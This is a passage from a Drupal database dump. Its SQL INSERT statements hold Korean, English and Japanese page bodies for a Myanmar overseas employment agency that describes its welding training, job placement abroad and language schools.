Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">산하</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">씬마락</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"> (Sinmalike)</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">조선소에 트레이너들와 함께 훌령한 기능공이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">되도록</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">용접수업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">제공하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">있으며</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">취업할 수 있게 취업들을 연계시키고 도와주고 있습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">또한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">두바이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">말레이시아</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">싱가포</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">태국</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">일본 같은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">국가에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">일하기를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">원하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">청년들에게</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">취업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">기회를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">받알 수 있도록&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">서비스들을 제공하고 있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">New Comet Trading Agency Co.ltd</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">미얀마의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">젊은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">치누들이 일본의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">개발한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">첨단</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">기술을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">배우고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">꿈을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">실현할</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">수</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">있도록</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">필요한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">교육을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">제공하고 돕고 있습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">일본으로 취업비자</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">연수비자로 가기</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">위해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">필요한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">자격시험</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">(JLPT, JFT, NAT-TEST, TOP-J)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">합격할</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">수</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">있도록</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">어학당도</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">개설</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">및 교육을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">지원하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">저희는</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">”</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>뉴코멧</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>해외직업소개회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>”&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-bidi-font-weight:bold;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">미얀마에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">우수한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">기능인력을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">배출하여</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">해외로</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">파견하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">서비스를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">제공하기</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">위해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">끊임없이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">노력하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span></p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 1, 145, 'en', 0, '<h3>Welcome to Our Website \"NEW COMET TRADING AGENCY\"!!!!</h3><h3>&nbsp;</h3><img src=\"/sites/default/files/inline-images/new_comet_trading_agency_0.jpg\" data-align=\"center\" data-entity-uuid=\"42e9d2a3-e284-49bb-81cb-2510b37a5871\" data-entity-type=\"file\"><p><span style=\"font-size:14.0pt;line-height:107%;\">We, ``NEW COMET TRADING\'\' company, was established in 2004 and started operating with company registration number (295/2004-2005).</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">NEW COMET TRADING AGENCY Co.,Ltd (New Comet Overseas Employment Agency) licence was obtained in 2023 and since then, the company has started to carry out service activities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">&nbsp;We, ``NEW COMET TRADING AGENCY\'\' company, which is a brother company, such as, ZEYA NEW COMET Auto Sale &amp; Services Co.,Ltd, NEW COMET Co.,Ltd, have applied for vehicle import permits from the Ministry of Economy and Commerce, and have been working for more than 25 years in the business of buying, importing and selling various types of business trucks, tourism and transportation buses and machinery directly from Japan, and have paid the taxes set for the state. More than 100 employees were given employment opportunities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, brother companies such as NEW COMET Construction Co.,Ltd, NEW ZAYYA SHWE PYI Construction Co.,Ltd, AUNG NAY WUN Construction Co.,Ltd and other companies have also successfully won tenders from government ministries and have provided employment opportunities to more than 200 employees.</span></p><p><span style=\"font-size:14.0pt;line-height:107%;\">Our company \"NEW COMET TRADING AGENCY “company is currently providing welding training courses to become qualified skilled workers at the Sinmalike Shipyard under the Ministry of Transport and Communications for ethnic brothers from all over Myanmar who want to work in Korea\'s shipyards and connect them with job opportunities.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, we are connecting job opportunities for young people who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, and Japan.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We at NEW COMET TRADING AGENCY Co.Ltd, are assisting on responsible for learning about Japan\'s developed advanced technologies, cultures and expressing their personal abilities and goals for the young generation in Myanmar.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In order to successfully pass the qualification tests (JLPT, JFT, NAT-TEST, TOP-J) required to go to Japan with a Work Visa and Training Visa, we are opening language training schools and providing teaching support.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We, \"NEW COMET TRADING AGENCY\" company, is constantly striving to provide services that produce talented skilled workers from Myanmar and send them to foreign countries.</span></p><p>&nbsp;</p><h3>&nbsp;</h3><p>&nbsp;</p>', '', 'full_html'),
('page', 0, 1, 145, 'ja', 0, '<p>Coming Soon....</p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 1, 145, 'ko', 0, '<h3>안녕하세요.우리 웹사이트 \"뉴코멧 영업 대행사\" &nbsp;에서 환영합니다.</h3><p>&nbsp;</p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">저희</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> ``New Comet Trading\'\'&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">회사는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 2004</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">년에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">설립되어</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun 